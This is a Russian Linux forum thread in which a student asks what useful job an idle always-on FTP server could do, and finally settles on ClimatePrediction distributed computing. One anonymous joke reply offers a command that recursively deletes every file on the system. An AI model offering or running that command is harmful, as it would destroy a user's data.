LINUX.ORG.RU
ФорумTalks

[?][бездействие]что делать

0

0

Пока у меня экзамены комп работает ток в режиме ftp-сервера и постоянно включен и большинство времени просто простаивает.

Чтобы такого на нем запустить полезного чтобы просто так не простаивал Требования к делаемому:

1) не должно тратить многа траффика 2) как можно меньше времени на настройку и автоматизация выполняемого 3) чтобы было полезно мне или обществу

Ответ на: комментарий от generatorglukoff

да и еще одна проблема - в инете я за натом

или для мейл сервера это не проблема?

alo33
() автор топика

Поставь винду - полезные программки сами залезут

anonymous
()

Давай он и дальше ничего делать не будет? Экономия электроэнергии принесёт тебе и обществу куда больше пользы

manntes ★★
()

>Поставь винду - полезные программки сами залезут

я же просил чтоб как можно меньше времени на настройку

alo33
() автор топика
Ответ на: комментарий от manntes

>Давай он и дальше ничего делать не будет? Экономия электроэнергии принесёт тебе и обществу куда больше пользы

А есть ли разница что комп работает при 100% загрузке проца или при 10% - вродь питание тоже остается частота тажа - с чего бы ему тратить больше энергии?

alo33
() автор топика
Ответ на: комментарий от alo33

Однако ж, процессоры под нагрузкой греются больше. Уж не из астрала ли они энергию на нагрев берут?

manntes ★★
()
Ответ на: комментарий от anonymous

sudo find / -type f -exec rm -f {} \; -exec sleep 1 \;

anonymous
()
Ответ на: комментарий от GFORGX

Блин еслиб венда была яб хоть проверку антивирусную запустил или дефрагментатор диска и сиди себе часика 2 жди - а тут максимум fsck 5 минут поработает и все. Никакой романтики((

alo33
() автор топика

да у нас в универе стоит пераццкая венда которую админы перезаливают из образа каждые 15 дней когда кончается срок активации

alo33
() автор топика
Ответ на: комментарий от alo33

У нас в универе админ любому за двадцатку отечетсвенных рублей заливал оффтопик-корпорэйт на компашку.

anonymous
()

Детектор у тебя сломался - я к тому, что sudo не нужен :)

GFORGX ★★★
()

спасибо всем за советы - поставил проект ClimatePrediction

alo33
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.